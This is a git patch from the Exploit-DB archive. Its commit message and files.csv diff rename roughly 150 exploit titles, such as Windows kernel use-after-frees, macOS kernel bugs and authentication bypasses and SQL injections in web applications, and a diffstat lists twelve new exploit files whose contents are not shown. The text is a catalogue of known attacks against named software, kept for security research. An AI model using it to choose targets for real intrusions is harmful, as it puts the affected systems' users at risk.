From 5bd93d7e45df44524d058c649d7aaab5bca6b29d Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 25 Oct 2017 05:01:35 +0000 Subject: [PATCH] DB: 2017-10-25 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 12 new exploits Apple Mac OSX xnu 1228.0 - mach-o Local Kernel Denial of Service (PoC) Apple Mac OSX xnu 1228.0 - 'mach-o' Local Kernel Denial of Service (PoC) Apple Mac OSX xnu 1228.0 - super_blob Local kernel Denial of Service (PoC) Apple Mac OSX xnu 1228.0 - 'super_blob' Local kernel Denial of Service (PoC) Administrador de Contenidos - Admin Login Bypass Administrador de Contenidos - Admin Authentication Bypass Microsoft Windows Kernel - DeferWindowPos Use-After-Free (MS15-073) Microsoft Windows Kernel - UserCommitDesktopMemory Use-After-Free (MS15-073) Microsoft Windows Kernel - 'DeferWindowPos' Use-After-Free (MS15-073) Microsoft Windows Kernel - 'UserCommitDesktopMemory' Use-After-Free (MS15-073) Microsoft Windows Kernel - HmgAllocateObjectAttr Use-After-Free (MS15-061) Microsoft Windows Kernel - win32k!vSolidFillRect Buffer Overflow (MS15-061) Microsoft Windows Kernel - SURFOBJ Null Pointer Dereference (MS15-061) Microsoft Windows Kernel - 'HmgAllocateObjectAttr' Use-After-Free (MS15-061) Microsoft Windows Kernel - 'win32k!vSolidFillRect' Buffer Overflow (MS15-061) Microsoft Windows Kernel - 'SURFOBJ' Null Pointer Dereference (MS15-061) Microsoft Windows Kernel - FlashWindowEx​ Memory Corruption (MS15-097) Microsoft Windows Kernel - bGetRealizedBrush Use-After-Free (MS15-097) Microsoft Windows Kernel - 'FlashWindowEx​' Memory Corruption (MS15-097) Microsoft Windows Kernel - 'bGetRealizedBrush' Use-After-Free (MS15-097) Microsoft Windows Kernel - NtGdiStretchBlt Pool Buffer Overflows (MS15-097) Microsoft Windows Kernel - 'NtGdiStretchBlt' Pool Buffer Overflows (MS15-097) Microsoft Windows Kernel - NtGdiBitBlt Buffer Overflow (MS15-097) Microsoft Windows Kernel - 'NtGdiBitBlt' Buffer Overflow (MS15-097) Blue Coat ProxySG 5.x - and Security Gateway OS Denial of Service Blue Coat ProxySG 5.x and Security Gateway OS - Denial of Service Microsoft Windows Kernel - win32k!OffsetChildren Null Pointer Dereference Microsoft Windows Kernel - 'win32k!OffsetChildren' Null Pointer Dereference Apple Mac OSX - IOBluetoothHCIUserClient Arbitrary Kernel Code Execution Apple Mac OSX - 'IOBluetoothHCIUserClient' Arbitrary Kernel Code Execution Apple Mac OSX - gst_configure Kernel Buffer Overflow Apple Mac OSX - IntelAccelerator::gstqConfigure Exploitable Kernel NULL Dereference Apple Mac OSX - 'gst_configure' Kernel Buffer Overflow Apple Mac OSX - 'IntelAccelerator::gstqConfigure' Exploitable Kernel NULL Dereference Microsoft Windows Kernel - NtGdiGetTextExtentExW Out-of-Bounds Memory Read Microsoft Windows Kernel - 'NtGdiGetTextExtentExW'' Out-of-Bounds Memory Read Microsoft Windows Kernel - win32k Denial of Service (MS16-135) Microsoft Windows Kernel - 'win32k' Denial of Service (MS16-135) Microsoft Windows 10 Kernel - nt!NtTraceControl (EtwpSetProviderTraits) Pool Memory Disclosure Microsoft Windows 10 Kernel - 'nt!NtTraceControl (EtwpSetProviderTraits)' Pool Memory Disclosure Microsoft Windows Kernel - win32k.sys '.TTF' Font Processing Out-of-Bounds Reads/Writes with Malformed 'fpgm' table (win32k!bGeneratePath) Microsoft Windows Kernel - win32k.sys .TTF Font Processing Out-of-Bounds Read with Malformed 'glyf' Table (win32k!fsc_CalcGrayRow) Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Reads/Writes with Malformed 'fpgm' table (win32k!bGeneratePath) Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Read with Malformed 'glyf' Table (win32k!fsc_CalcGrayRow) AIX 5.2 - netpmon Local Elevated Privileges Exploit AIX 5.2 - ipl_varyon Local Elevated Privileges Exploit AIX 5.2 - 'netpmon' Local Privilege Escalation AIX 5.2 - 'ipl_varyon' Local Privilege Escalation Willing Webcam 2.8 - Licence Info Disclosure Local Exploit Willing Webcam 2.8 - Licence Information Disclosure Local Exploit Solaris 7.0 cancel - Exploit Solaris 7.0 chkperm - Exploit Solaris 7.0 - 'cancel' Exploit Solaris 7.0 - 'chkperm' Exploit Apple Mac OSX 10.4.x - Shared_Region_Make_Private_Np Kernel Function Local Memory Corruption Apple Mac OSX 10.4.x - 'Shared_Region_Make_Private_Np' Kernel Function Local Memory Corruption Apple macOS < 10.12.2 / iOS < 10.2 Kernel - _kernelrpc_mach_port_insert_right_trap Reference Count Leak / Use-After-Free Apple macOS < 10.12.2 / iOS < 10.2 - '_kernelrpc_mach_port_insert_right_trap' Kernel Reference Count Leak / Use-After-Free Mikogo 5.4.1.160608 - Local Credentials Disclosure THOMSON ST585 - 'user.ini' Arbitrary Download THOMSON ST585 - 'user.ini' Arbitrary Disclosure THOMSON TG585n 7.4.3.2 - 'user.ini' Arbitrary Download THOMSON TG585n 7.4.3.2 - 'user.ini' Arbitrary Disclosure Adobe Flash and Reader - Live Malware (PoC) Adobe Flash / Reader - Live Malware (PoC) Unify eWave ServletExec 3 - JSP Source Disclosure Unify eWave ServletExec 3 - .JSP Source Disclosure 1C: Arcadia Internet Store 1.0 - Show Path 1C: Arcadia Internet Store 1.0 - Path Disclosure Adobe ColdFusion 9 - Administrative Login Bypass (Metasploit) Adobe ColdFusion 9 - Administrative Authentication Bypass (Metasploit) Apache Tomcat 6.0.13 - Cookie Handling Quote Delimiter Session ID Disclosure Apache Tomcat 6.0.13 - Insecure Cookie Handling Quote Delimiter Session ID Disclosure myNewsletter 1.1.2 - 'adminLogin.asp' Login Bypass myNewsletter 1.1.2 - 'adminLogin.asp' Authentication Bypass 2BGal 3.0 - '/admin/configuration.inc.php' Local Inclusion Exploit 2BGal 3.0 - '/admin/configuration.inc.php' Local File Inclusion Estate Agent Manager 1.3 - 'default.asp' Login Bypass Property Pro 1.0 - 'vir_Login.asp' Remote Login Bypass Estate Agent Manager 1.3 - 'default.asp' Authentication Bypass Property Pro 1.0 - 'vir_Login.asp' Remote Authentication Bypass Hpecs Shopping Cart - Remote Login Bypass Hpecs Shopping Cart - Remote Authentication Bypass HR Assist 1.05 - 'vdateUsr.asp' Remote Login Bypass HR Assist 1.05 - 'vdateUsr.asp' Remote Authentication Bypass PHPX 3.5.16 - Cookie Poisoning / Login Bypass PHPX 3.5.16 - Cookie Poisoning / Authentication Bypass Absolute File Send 1.0 - Remote Cookie Handling Absolute File Send 1.0 - Remote Insecure Cookie Handling Absolute Poll Manager XE 4.1 - Cookie Handling Absolute Poll Manager XE 4.1 - Insecure Cookie Handling TR News 2.1 - 'login.php' Remote Login Bypass TR News 2.1 - 'login.php' Remote Authentication Bypass PhpAddEdit 1.3 - 'cookie' Login Bypass PhpAddEdit 1.3 - 'cookie' Authentication Bypass 2532/Gigs 1.2.2 Stable - Remote Login Bypass 2532/Gigs 1.2.2 Stable - Remote Authentication Bypass Flexcustomer 0.0.6 - Admin Login Bypass / Possible PHP code writing Flexcustomer 0.0.6 - Admin Authentication Bypass / Possible PHP code writing ClearBudget 0.6.1 - Insecure Database Download ClearBudget 0.6.1 - Insecure Database Disclosure ClanTiger < 1.1.1 - Multiple Cookie Handling Vulnerabilities ClanTiger < 1.1.1 - Multiple Insecure Cookie Handling Vulnerabilities 2DayBiz Custom T-shirt Design -(SQL Injection / Cross-Site Scripting 2DayBiz Custom T-shirt Design - SQL Injection / Cross-Site Scripting ILIAS Lms 3.9.9/3.10.7 - Arbitrary Edition/Info Disclosure Vulnerabilities ILIAS Lms 3.9.9/3.10.7 - Arbitrary Edition/Information Disclosure Vulnerabilities Amiro.CMS 5.4.0.0 - Folder Disclosure Amiro.CMS 5.4.0.0 - Path Disclosure Mura CMS 5.1 - Root Folder Disclosure Mura CMS 5.1 - Root Path Disclosure jgbbs-3.0beta1 - Database Download PSnews - Database Download jgbbs-3.0beta1 - Database Disclosure PSnews - Database Disclosure AspBB - Active Server Page Bulletin Board Database Download Futility Forum 1.0 Revamp - Database Download htmlArea 2.03 - Database Download Uguestbook - Database Download BaalASP 2.0 - Database Download Fully Functional ASP Forum 1.0 - Database Download makit news/blog poster 3.1 - Database Download AspBB - Active Server Page Bulletin Board Database Disclosure Futility Forum 1.0 Revamp - Database Disclosure htmlArea 2.03 - Database Disclosure Uguestbook - Database Disclosure BaalASP 2.0 - Database Disclosure Fully Functional ASP Forum 1.0 - Database Disclosure makit news/blog poster 3.1 - Database Disclosure ASP Battle Blog - Database Download ASP Battle Blog - Database Disclosure Proxyroll.com Clone PHP Script - Cookie Handling Proxyroll.com Clone PHP Script - Insecure Cookie Handling YP Portal MS-Pro Surumu 1.0 - Database Download YP Portal MS-Pro Surumu 1.0 - Database Disclosure Lebi soft Ziyaretci Defteri 7.5 - Database Download Net Gitar Shop 1.0 - Database Download Lebi soft Ziyaretci Defteri 7.5 - Database Disclosure Net Gitar Shop 1.0 - Database Disclosure VP-ASP Shopping Cart 7.0 - Database Download VP-ASP Shopping Cart 7.0 - Database Disclosure Asp VevoCart Control System 3.0.4 - Database Download Asp VevoCart Control System 3.0.4 - Database Disclosure MoME CMS 0.8.5 - Remote Login Bypass RoseOnlineCMS 3 B1 - Remote Login Bypass MoME CMS 0.8.5 - Remote Authentication Bypass RoseOnlineCMS 3 B1 - Remote Authentication Bypass al3jeb script - Remote Login Bypass al3jeb script - Remote Authentication Bypass Al Sat Scripti - Database Download Al Sat Scripti - Database Disclosure Mp3 MuZik - DataBase Download Mp3 MuZik - Database Disclosure My School Script - Data Base Download My School Script - Database Disclosure Azimut Technologie - Admin Login Bypass Azimut Technologie - Admin Authentication Bypass Auction_Software Script - Admin Login Bypass Auction_Software Script - Admin Authentication Bypass BSI Hotel Booking System Admin 1.4/2.0 - Login Bypass BSI Hotel Booking System Admin 1.4/2.0 - Authentication Bypass DeluxeBB 1.3 - Private Info Disclosure DeluxeBB 1.3 - Private Information Disclosure Qcodo Development Framework 0.3.3 - Full Info Disclosure Qcodo Development Framework 0.3.3 - Full Information Disclosure CosmoQuest - Login Bypass CosmoQuest - Authentication Bypass PHProjekt 2.x/3.x - Login Bypass PHProjekt 2.x/3.x - Authentication Bypass MapInfo Discovery 1.0/1.1 - Administrative Login Bypass MapInfo Discovery 1.0/1.1 - Administrative Authentication Bypass Keyvan1 ImageGallery - Database Download Keyvan1 ImageGallery - Database Disclosure Simple File Manager 024 - Login Bypass Simple File Manager 024 - Authentication Bypass Adobe ColdFusion 9 - Administrative Login Bypass Adobe ColdFusion 9 - Administrative Authentication Bypass RASPcalendar 1.01 - [ASP] Admin Login RASPcalendar 1.01 (ASP) - Admin Login Zend-Framework - Full Info Disclosure Zend-Framework - Full Information Disclosure Simple E-document 1.31 - Login Bypass Simple E-document 1.31 - Authentication Bypass ZYXEL P-660HN-T1A Router - Login Bypass ZYXEL P-660HN-T1A Router - Authentication Bypass agXchange ESM - 'ucschcancelproc.jsp' Open redirection agXchange ESM - 'ucschcancelproc.jsp' Open Redirection ESRI ArcGIS for Server - 'where' Form Field SQL Injection ESRI ArcGIS for Server - 'where' Form SQL Injection ZTE ZXHN H108N Router - Unauthenticated Config Download ZTE ZXHN H108N Router - Unauthenticated Config Disclosure FS Car Rental Script - 'pickup_location' SQL Injection FS Amazon Clone - 'category_id' SQL Injection FS Book Store Script - 'category' SQL Injection FS Ebay Clone - 'pd_maincat_id' SQL Injection FS Food Delivery Script - 'keywords' SQL Injection FS Expedia Clone - 'hid' SQL Injection FS Freelancer Clone - 'sk' SQL Injection FS Groupon Clone - 'category' SQL Injection FS Indiamart Clone - 'keywords' SQL Injection FS Lynda Clone - 'category' SQL Injection FS OLX Clone - 'catg_id' SQL Injection --- files.csv | 202 ++++++++++++++++--------------- platforms/php/webapps/43034.txt | 45 +++++++ platforms/php/webapps/43035.txt | 45 +++++++ platforms/php/webapps/43036.txt | 37 ++++++ platforms/php/webapps/43037.txt | 41 +++++++ platforms/php/webapps/43038.txt | 41 +++++++ platforms/php/webapps/43039.txt | 44 +++++++ platforms/php/webapps/43040.txt | 40 ++++++ platforms/php/webapps/43041.txt | 40 ++++++ platforms/php/webapps/43042.txt | 36 ++++++ platforms/php/webapps/43043.txt | 39 ++++++ platforms/php/webapps/43044.txt | 37 ++++++ platforms/windows/local/43033.py | 103 ++++++++++++++++ 13 files changed, 655 insertions(+), 95 deletions(-) create mode 100755 platforms/php/webapps/43034.txt create mode 100755 platforms/php/webapps/43035.txt create mode 100755 platforms/php/webapps/43036.txt create mode 100755 platforms/php/webapps/43037.txt create mode 100755 platforms/php/webapps/43038.txt create mode 100755 platforms/php/webapps/43039.txt create mode 100755 platforms/php/webapps/43040.txt create mode 100755 platforms/php/webapps/43041.txt create mode 100755 platforms/php/webapps/43042.txt create mode 100755 platforms/php/webapps/43043.txt create mode 100755 platforms/php/webapps/43044.txt create mode 100755 platforms/windows/local/43033.py diff --git a/files.csv b/files.csv index 8cec67b1b..a27336e77 100644 --- a/files.csv +++ b/files.csv @@ -662,12 +662,12 @@ id,file,description,date,author,platform,type,port 4682,platforms/windows/dos/4682.c,"Microsoft Windows Media Player - '.AIFF' Divide By Zero Exception Denial of Service (PoC)",2007-11-29,"Gil-Dong / Woo-Chi",windows,dos,0 4683,platforms/windows/dos/4683.py,"RealPlayer 11 - '.au' Denial of Service",2007-12-01,NtWaK0,windows,dos,0 4688,platforms/windows/dos/4688.html,"VideoLAN VLC Media Player 0.86 < 0.86d - ActiveX Remote Bad Pointer Initialization",2007-12-04,"Ricardo Narvaja",windows,dos,0 -4689,platforms/osx/dos/4689.c,"Apple Mac OSX xnu 1228.0 - mach-o Local Kernel Denial of Service (PoC)",2007-12-04,mu-b,osx,dos,0 +4689,platforms/osx/dos/4689.c,"Apple Mac OSX xnu 1228.0 - 'mach-o' Local Kernel Denial of Service (PoC)",2007-12-04,mu-b,osx,dos,0 4690,platforms/osx/dos/4690.c,"Apple Mac OSX 10.5.0 (Leopard) - vpnd Remote Denial of Service (PoC)",2007-12-04,mu-b,osx,dos,0 4692,platforms/hardware/dos/4692.pl,"Cisco Phone 7940 - Remote Denial of Service",2007-12-05,MADYNES,hardware,dos,0 4716,platforms/windows/dos/4716.html,"Online Media Technologies 'AVSMJPEGFILE.DLL 1.1' - Remote Buffer Overflow (PoC)",2007-12-11,shinnai,windows,dos,0 4717,platforms/windows/dos/4717.py,"Simple HTTPD 1.41 - '/aux' Remote Denial of Service",2007-12-11,shinnai,windows,dos,0 -4723,platforms/osx/dos/4723.c,"Apple Mac OSX xnu 1228.0 - super_blob Local kernel Denial of Service (PoC)",2007-12-12,mu-b,osx,dos,0 +4723,platforms/osx/dos/4723.c,"Apple Mac OSX xnu 1228.0 - 'super_blob' Local kernel Denial of Service (PoC)",2007-12-12,mu-b,osx,dos,0 4732,platforms/linux/dos/4732.c,"Samba 3.0.27a - 'send_mailslot()' Remote Buffer Overflow",2007-12-14,x86,linux,dos,0 4742,platforms/windows/dos/4742.py,"WFTPD Explorer Pro 1.0 - Remote Heap Overflow (PoC)",2007-12-18,r4x,windows,dos,0 4748,platforms/windows/dos/4748.php,"Surgemail 38k4 - webmail Host header Denial of Service",2007-12-18,rgod,windows,dos,0 @@ -1535,7 +1535,7 @@ id,file,description,date,author,platform,type,port 12509,platforms/osx/dos/12509.html,"Multiple Browsers - 'window.print()' Denial of Service",2010-05-04,Dr_IDE,osx,dos,0 12518,platforms/windows/dos/12518.pl,"Microsoft Paint - Integer Overflow (Denial of Service) (MS10-005)",2010-05-06,unsign,windows,dos,0 12524,platforms/windows/dos/12524.py,"Microsoft Windows - SMB2 Negotiate Protocol (0x72) Response Denial of Service",2010-05-07,"Jelmer de Hen",windows,dos,0 -12527,platforms/asp/dos/12527.txt,"Administrador de Contenidos - Admin Login Bypass",2010-05-07,Ra3cH,asp,dos,0 +12527,platforms/asp/dos/12527.txt,"Administrador de Contenidos - Admin Authentication Bypass",2010-05-07,Ra3cH,asp,dos,0 12529,platforms/windows/dos/12529.py,"ESET Smart Security 4.2 and NOD32 AntiVirus 4.2 (x86/x64) - LZH archive parsing (PoC)",2010-05-07,"Oleksiuk Dmitry_ eSage Lab",windows,dos,0 12530,platforms/windows/dos/12530.rb,"TFTPGUI 1.4.5 - Long Transport Mode Overflow Denial of Service (Metasploit)",2010-05-08,"Jeremiah Talamantes",windows,dos,0 12531,platforms/windows/dos/12531.pl,"GeoHttpServer - Remote Denial of Service",2010-05-08,aviho1,windows,dos,0 @@ -4747,21 +4747,21 @@ id,file,description,date,author,platform,type,port 38263,platforms/osx/dos/38263.txt,"Apple Mac OSX Regex Engine (TRE) - Stack Buffer Overflow",2015-09-22,"Google Security Research",osx,dos,0 38264,platforms/osx/dos/38264.txt,"Apple qlmanage - SceneKit::daeElement::setElementName Heap Overflow",2015-09-22,"Google Security Research",osx,dos,0 38265,platforms/win_x86/dos/38265.txt,"Microsoft Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (2)",2015-09-22,"Nils Sommer",win_x86,dos,0 -38266,platforms/win_x86/dos/38266.txt,"Microsoft Windows Kernel - DeferWindowPos Use-After-Free (MS15-073)",2015-09-22,"Nils Sommer",win_x86,dos,0 -38267,platforms/win_x86/dos/38267.txt,"Microsoft Windows Kernel - UserCommitDesktopMemory Use-After-Free (MS15-073)",2015-09-22,"Nils Sommer",win_x86,dos,0 +38266,platforms/win_x86/dos/38266.txt,"Microsoft Windows Kernel - 'DeferWindowPos' Use-After-Free (MS15-073)",2015-09-22,"Nils Sommer",win_x86,dos,0 +38267,platforms/win_x86/dos/38267.txt,"Microsoft Windows Kernel - 'UserCommitDesktopMemory' Use-After-Free (MS15-073)",2015-09-22,"Nils Sommer",win_x86,dos,0 38268,platforms/win_x86/dos/38268.txt,"Microsoft Windows Kernel - Pool Buffer Overflow Drawing Caption Bar (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0 -38269,platforms/win_x86/dos/38269.txt,"Microsoft Windows Kernel - HmgAllocateObjectAttr Use-After-Free (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0 -38270,platforms/win_x86/dos/38270.txt,"Microsoft Windows Kernel - win32k!vSolidFillRect Buffer Overflow (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0 -38271,platforms/win_x86/dos/38271.txt,"Microsoft Windows Kernel - SURFOBJ Null Pointer Dereference (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0 +38269,platforms/win_x86/dos/38269.txt,"Microsoft Windows Kernel - 'HmgAllocateObjectAttr' Use-After-Free (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0 +38270,platforms/win_x86/dos/38270.txt,"Microsoft Windows Kernel - 'win32k!vSolidFillRect' Buffer Overflow (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0 +38271,platforms/win_x86/dos/38271.txt,"Microsoft Windows Kernel - 'SURFOBJ' Null Pointer Dereference (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0 38272,platforms/windows/dos/38272.txt,"Microsoft Windows Kernel - Brush Object Use-After-Free (MS15-061)",2015-09-22,"Google Security Research",windows,dos,0 38273,platforms/win_x86/dos/38273.txt,"Microsoft Windows Kernel - WindowStation Use-After-Free (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0 38274,platforms/win_x86/dos/38274.txt,"Microsoft Windows Kernel - Null Pointer Dereference with Window Station and Clipboard (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0 38275,platforms/win_x86/dos/38275.txt,"Microsoft Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (1)",2015-09-22,"Nils Sommer",win_x86,dos,0 -38276,platforms/win_x86/dos/38276.txt,"Microsoft Windows Kernel - FlashWindowEx​ Memory Corruption (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos,0 -38277,platforms/win_x86/dos/38277.txt,"Microsoft Windows Kernel - bGetRealizedBrush Use-After-Free (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos,0 +38276,platforms/win_x86/dos/38276.txt,"Microsoft Windows Kernel - 'FlashWindowEx​' Memory Corruption (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos,0 +38277,platforms/win_x86/dos/38277.txt,"Microsoft Windows Kernel - 'bGetRealizedBrush' Use-After-Free (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos,0 38278,platforms/win_x86/dos/38278.txt,"Microsoft Windows Kernel - Use-After-Free with Cursor Object (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos,0 38279,platforms/win_x86/dos/38279.txt,"Microsoft Windows Kernel - Use-After-Free with Printer Device Contexts (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos,0 -38280,platforms/win_x86/dos/38280.txt,"Microsoft Windows Kernel - NtGdiStretchBlt Pool Buffer Overflows (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos,0 +38280,platforms/win_x86/dos/38280.txt,"Microsoft Windows Kernel - 'NtGdiStretchBlt' Pool Buffer Overflows (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos,0 38281,platforms/windows/dos/38281.txt,"Kaspersky AntiVirus - VB6 Parsing Integer Overflow",2015-09-22,"Google Security Research",windows,dos,0 38282,platforms/windows/dos/38282.txt,"Kaspersky AntiVirus - ExeCryptor Parsing Memory Corruption",2015-09-22,"Google Security Research",windows,dos,0 38283,platforms/windows/dos/38283.txt,"Kaspersky AntiVirus - PE Unpacking Integer Overflow",2015-09-22,"Google Security Research",windows,dos,0 @@ -4769,7 +4769,7 @@ id,file,description,date,author,platform,type,port 38285,platforms/windows/dos/38285.txt,"Kaspersky AntiVirus - CHM Parsing Stack Buffer Overflow",2015-09-22,"Google Security Research",windows,dos,0 38286,platforms/windows/dos/38286.txt,"Kaspersky AntiVirus - UPX Parsing Memory Corruption",2015-09-22,"Google Security Research",windows,dos,0 38288,platforms/windows/dos/38288.txt,"Kaspersky AntiVirus - Yoda's Protector Unpacking Memory Corruption",2015-09-22,"Google Security Research",windows,dos,0 -38307,platforms/win_x86/dos/38307.txt,"Microsoft Windows Kernel - NtGdiBitBlt Buffer Overflow (MS15-097)",2015-09-24,"Nils Sommer",win_x86,dos,0 +38307,platforms/win_x86/dos/38307.txt,"Microsoft Windows Kernel - 'NtGdiBitBlt' Buffer Overflow (MS15-097)",2015-09-24,"Nils Sommer",win_x86,dos,0 38317,platforms/windows/dos/38317.txt,"FreshFTP 5.52 - '.qfl' Crash (PoC)",2015-09-25,Un_N0n,windows,dos,0 38336,platforms/windows/dos/38336.py,"Git 1.9.5 - 'ssh-agent.exe' Buffer Overflow",2015-09-28,hyp3rlinx,windows,dos,0 38337,platforms/ios/dos/38337.txt,"Telegram 3.2 - Input Length Handling Crash (PoC)",2015-09-28,"Mohammad Reza Espargham",ios,dos,0 @@ -4842,7 +4842,7 @@ id,file,description,date,author,platform,type,port 38761,platforms/windows/dos/38761.py,"Sam Spade 1.14 - Decode URL Buffer Overflow Crash (PoC)",2015-11-19,"Vivek Mahajan",windows,dos,0 38763,platforms/lin_x86/dos/38763.txt,"Google Chrome - open-vcdiff Out-of-Bounds Read in Browser Process Integer Overflow",2015-11-19,"Google Security Research",lin_x86,dos,0 38771,platforms/windows/dos/38771.py,"ShareKM - Remote Denial of Service",2013-09-22,"Yuda Prawira",windows,dos,0 -38778,platforms/linux/dos/38778.txt,"Blue Coat ProxySG 5.x - and Security Gateway OS Denial of Service",2013-09-23,anonymous,linux,dos,0 +38778,platforms/linux/dos/38778.txt,"Blue Coat ProxySG 5.x and Security Gateway OS - Denial of Service",2013-09-23,anonymous,linux,dos,0 38779,platforms/multiple/dos/38779.py,"Abuse HTTP Server - Remote Denial of Service",2013-09-30,"Zico Ekel",multiple,dos,0 38787,platforms/windows/dos/38787.txt,"Acrobat Reader DC 15.008.20082.15957 - '.PDF' Parsing Memory Corruption",2015-11-23,"Francis Provencher",windows,dos,0 38788,platforms/windows/dos/38788.txt,"Oracle Outside In PDF 8.5.2 - Parsing Memory Corruption (1)",2015-11-23,"Francis Provencher",windows,dos,0 @@ -4895,7 +4895,7 @@ id,file,description,date,author,platform,type,port 39022,platforms/windows/dos/39022.txt,"Adobe Flash GradientFill - Use-After-Frees",2015-12-17,"Google Security Research",windows,dos,0 40105,platforms/multiple/dos/40105.txt,"Adobe Flash Player 22.0.0.192 - TAG Memory Corruption",2016-07-13,COSIG,multiple,dos,0 40104,platforms/multiple/dos/40104.txt,"Adobe Flash Player 22.0.0.192 - SceneAndFrameData Memory Corruption",2016-07-13,COSIG,multiple,dos,0 -39025,platforms/windows/dos/39025.txt,"Microsoft Windows Kernel - win32k!OffsetChildren Null Pointer Dereference",2015-12-17,"Nils Sommer",windows,dos,0 +39025,platforms/windows/dos/39025.txt,"Microsoft Windows Kernel - 'win32k!OffsetChildren' Null Pointer Dereference",2015-12-17,"Nils Sommer",windows,dos,0 39026,platforms/win_x86/dos/39026.txt,"win32k Desktop and Clipboard - Null Pointer Dereference",2015-12-17,"Nils Sommer",win_x86,dos,0 39027,platforms/win_x86/dos/39027.txt,"win32k Clipboard Bitmap - Use-After-Free",2015-12-17,"Nils Sommer",win_x86,dos,0 39037,platforms/windows/dos/39037.php,"Apache 2.4.17 - Denial of Service",2015-12-18,rUnViRuS,windows,dos,0 @@ -4953,7 +4953,7 @@ id,file,description,date,author,platform,type,port 39233,platforms/windows/dos/39233.txt,"Microsoft Office / COM Object - 'WMALFXGFXDSP.dll' DLL Planting (MS16-007)",2016-01-13,"Google Security Research",windows,dos,0 39242,platforms/windows/dos/39242.py,"NetSchedScan 1.0 - Crash (PoC)",2016-01-15,"Abraham Espinosa",windows,dos,0 39371,platforms/osx/dos/39371.c,"Apple Mac OSX - IOBluetoothHCIPacketLogUserClient Memory Corruption",2016-01-28,"Google Security Research",osx,dos,0 -39372,platforms/osx/dos/39372.c,"Apple Mac OSX - IOBluetoothHCIUserClient Arbitrary Kernel Code Execution",2016-01-28,"Google Security Research",osx,dos,0 +39372,platforms/osx/dos/39372.c,"Apple Mac OSX - 'IOBluetoothHCIUserClient' Arbitrary Kernel Code Execution",2016-01-28,"Google Security Research",osx,dos,0 39274,platforms/windows/dos/39274.py,"CesarFTP 0.99g - XCWD Denial of Service",2016-01-19,"Irving Aguilar",windows,dos,21 39275,platforms/windows/dos/39275.txt,"PDF-XChange Viewer 2.5.315.0 - Shading Type 7 Heap Memory Corruption",2016-01-19,"Sébastien Morin",windows,dos,0 39305,platforms/freebsd/dos/39305.py,"FreeBSD SCTP ICMPv6 - Error Processing",2016-01-25,ptsecurity,freebsd,dos,0 @@ -4982,8 +4982,8 @@ id,file,description,date,author,platform,type,port 39365,platforms/multiple/dos/39365.c,"Apple Mac OSX / iOS Kernel - IOHDIXControllUserClient::clientClose Use-After-Free/Double-Free",2016-01-28,"Google Security Research",multiple,dos,0 39366,platforms/multiple/dos/39366.c,"Apple Mac OSX / iOS Kernel - iokit Registry Iterator Manipulation Double-Free",2016-01-28,"Google Security Research",multiple,dos,0 39367,platforms/osx/dos/39367.c,"Apple Mac OSX - io_service_close Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 -39368,platforms/osx/dos/39368.c,"Apple Mac OSX - gst_configure Kernel Buffer Overflow",2016-01-28,"Google Security Research",osx,dos,0 -39369,platforms/osx/dos/39369.c,"Apple Mac OSX - IntelAccelerator::gstqConfigure Exploitable Kernel NULL Dereference",2016-01-28,"Google Security Research",osx,dos,0 +39368,platforms/osx/dos/39368.c,"Apple Mac OSX - 'gst_configure' Kernel Buffer Overflow",2016-01-28,"Google Security Research",osx,dos,0 +39369,platforms/osx/dos/39369.c,"Apple Mac OSX - 'IntelAccelerator::gstqConfigure' Exploitable Kernel NULL Dereference",2016-01-28,"Google Security Research",osx,dos,0 39370,platforms/osx/dos/39370.c,"Apple Mac OSX Kernel - Hypervisor Driver Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 39376,platforms/osx/dos/39376.c,"Apple Mac OSX - IOSCSIPeripheralDeviceType00 Userclient Type 12 Exploitable Kernel NULL Dereference",2016-01-28,"Google Security Research",osx,dos,0 39377,platforms/multiple/dos/39377.c,"Apple Mac OSX / iOS - Unsandboxable Kernel Use-After-Free in Mach Vouchers",2016-01-28,"Google Security Research",multiple,dos,0 @@ -5091,7 +5091,7 @@ id,file,description,date,author,platform,type,port 39638,platforms/linux/dos/39638.txt,"Kamailio 4.3.4 - Heap Based Buffer Overflow",2016-03-30,"Stelios Tsampas",linux,dos,0 39644,platforms/multiple/dos/39644.txt,"Wireshark - dissect_pktc_rekey Heap Based Out-of-Bounds Read",2016-03-31,"Google Security Research",multiple,dos,0 39647,platforms/windows/dos/39647.txt,"Microsoft Windows Kernel - Bitmap Use-After-Free",2016-04-01,"Nils Sommer",windows,dos,0 -39648,platforms/windows/dos/39648.txt,"Microsoft Windows Kernel - NtGdiGetTextExtentExW Out-of-Bounds Memory Read",2016-04-01,"Nils Sommer",windows,dos,0 +39648,platforms/windows/dos/39648.txt,"Microsoft Windows Kernel - 'NtGdiGetTextExtentExW'' Out-of-Bounds Memory Read",2016-04-01,"Nils Sommer",windows,dos,0 39649,platforms/multiple/dos/39649.txt,"Adobe Flash - URLStream.readObject Use-After-Free",2016-04-01,"Google Security Research",multiple,dos,0 39650,platforms/multiple/dos/39650.txt,"Adobe Flash - textfield.maxChars Use-After-Free",2016-04-01,"Google Security Research",multiple,dos,0 39651,platforms/android/dos/39651.txt,"Google Android - 'ih264d_process_intra_mb' Memory Corruption",2016-04-01,"Google Security Research",android,dos,0 @@ -5286,7 +5286,7 @@ 